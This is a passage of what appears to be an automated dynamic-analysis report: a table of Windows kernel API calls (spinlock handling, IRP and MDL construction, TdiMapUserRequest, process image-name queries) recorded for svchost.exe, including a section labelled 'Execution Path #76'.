| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76618c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003b9bd520 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002fd90370, ret_val_unk_out = 0xffffe0003b7c9cf0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003b9bd520, MemoryDescriptorList_unk_out = 0xffffe0003b9bd520 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003b7c9cf0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b7c9cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003b9bd520 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a763d44, SpinLock_unk_out = 0xffffe0003a763d44, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a763d44, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a763d44 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0a8, SpinLock_unk_out = 0xfffff800fc55c0a8, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0a8, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0a8 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c564590, Irp_unk_out = 0xffffe0003c564590, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1fe4, SpinLock_unk_out = 0xffffe0003a7b1fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a779fe4, SpinLock_unk_out = 0xffffe0003a779fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a779fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a779fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
Execution Path #76 (length: 143, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 143 |
Processes
»
| Process | Count |
|---|---|
| Process 12 (svchost.exe, PID: 1052) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a769d84, SpinLock_unk_out = 0xffffe0003a769d84, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a769d84, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a769d84 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a766464, SpinLock_unk_out = 0xffffe0003a766464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a766464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a766464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a76ffe4, SpinLock_unk_out = 0xffffe0003a76ffe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a76ffe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a76ffe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| TdiMapUserRequest | ret_val_out = 0xc0000002 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002c852570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002c852528, Handle_out = 0xffffffff800010a0, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010a0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff800010a0, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff800010a0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffe |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a76fd0c, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f1250 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003c697cd0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002c852370, ret_val_unk_out = 0xffffe0003c83f8f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f1250, MemoryDescriptorList_unk_out = 0xffffe0003c1f1250 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003c697cd0, Irp_unk = 0xffffe0003c83f8f0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003c83f8f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1f1250 |
| PsGetCurrentProcessId | ret_val_unk_out = 0x41c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| PsLookupProcessByProcessId | ProcessId_unk = 0x41c, Process_unk_out = 0xffffd0002c852570, ret_val_out = 0x0 |
| ObOpenObjectByPointer | Object_ptr = 0xffffe0003be10400, HandleAttributes = 0x200, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0x0, AccessMode_unk = 0xfffff80041aa4800, Handle_ptr_out = 0xffffd0002c852528, Handle_out = 0xffffffff80000cbc, ret_val_out = 0x0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x0, ProcessInformation_ptr_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0xc0000004 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003c6341c0 |
| ZwQueryInformationProcess | ProcessHandle_unk = 0xffffffff80000cbc, ProcessInformationClass_unk = 0x1b, ProcessInformationLength = 0x7a, ProcessInformation_ptr_out = 0xffffe0003c6341c0, ReturnLength_ptr_out = 0xffffd0002c852520, ret_val_out = 0x0 |
| ZwClose | Handle_unk = 0xffffffff80000cbc, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003be10400, ret_val_ptr_out = 0x47ffd |
| RtlDowncaseUnicodeString | DestinationString = , SourceString = \Device\HarddiskVolume1\Windows\System32\svchost.exe, AllocateDestinationString = 0, ret_val_out = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a769aac, Length = 0x55, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1f1250 |
| IoBuildDeviceIoControlRequest | IoControlCode = 0x3, DeviceObject_unk = 0xffffe0003ae849a0, InputBuffer_ptr = 0x0, InputBufferLength = 0x0, OutputBufferLength = 0x0, InternalDeviceIoControl = 1, Event_unk = 0x0, OutputBuffer_ptr_out = 0x0, IoStatusBlock_unk_out = 0xffffd0002c852370, ret_val_unk_out = 0xffffe0003c83f8f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1f1250, MemoryDescriptorList_unk_out = 0xffffe0003c1f1250 |
| IofCallDriver | DeviceObject_unk = 0xffffe0003ae849a0, Irp_unk = 0xffffe0003c83f8f0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003c83f8f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
